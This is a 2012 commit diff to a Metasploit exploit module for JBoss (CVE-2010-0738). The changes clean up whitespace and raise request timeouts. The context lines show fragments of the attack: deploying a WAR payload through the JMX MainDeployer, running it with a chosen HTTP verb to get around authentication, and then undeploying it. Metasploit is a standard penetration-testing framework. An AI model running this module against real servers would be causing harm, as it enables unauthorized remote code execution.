Added support for CVE-2010-0738, msftidy

2012-08-15 15:47:14 -04:00 · 2012-08-15 15:47:14 -04:00 · 6965431389
parent e5498e3e1d
commit 6965431389
1 changed files with 10 additions and 10 deletions
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console' ]),
 				OptString.new('WARHOST',  [ false, 'The host to request the WAR payload from' ]),
 				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
-         		OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
+				OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])


 			], self.class)
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'argType'     => 'java.lang.String',
 							'arg0'        => service_url
 						}
-				}, 20)
+				}, 30)
 		end
 		if (! res)
 			fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
@ -236,11 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("Executing #{app_base}...")

-        # The payload doesn't like POST requests
-		# As the war file is not stored inside the jmx-console, we don't have to 
+		# The payload doesn't like POST requests
+		# As the war file is not stored inside the jmx-console, we don't have to
 		# care about the selected http method
-        tmp_verb = datastore['VERB'] 
-        tmp_verb = 'GET' if tmp_verb == 'POST'
+		tmp_verb = datastore['VERB']
+		tmp_verb = 'GET' if tmp_verb == 'POST'

 		# JBoss might need some time for the deployment. Try 5 times at most and
 		# wait 3 seconds inbetween tries
@ -249,8 +249,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		num_attempts.times do |attempt|
 			res = send_request_cgi({
 					'uri'     => uri,
-					'method'  => tmp_verb 
-				}, 20)
+					'method'  => tmp_verb
+				}, 30)

 			msg = nil
 			if (! res)
@ -289,14 +289,14 @@ class Metasploit3 < Msf::Exploit::Remote
 					'argType'     => 'java.lang.String',
 					'arg0'        => app_base
 				}
-		}, 20)
+		}, 30)
 		if (! res)
 			print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
 		elsif (res.code == 500 and datastore['VERB'] == 'POST')
 			# POST requests result in a http 500 error, but the payload is removed..."
 			print_status("WARNING: Undeployment might have failed (unlikely)")
 		elsif (res.code < 200 or res.code >= 300)
-			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") 
+			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
 		end

 		handler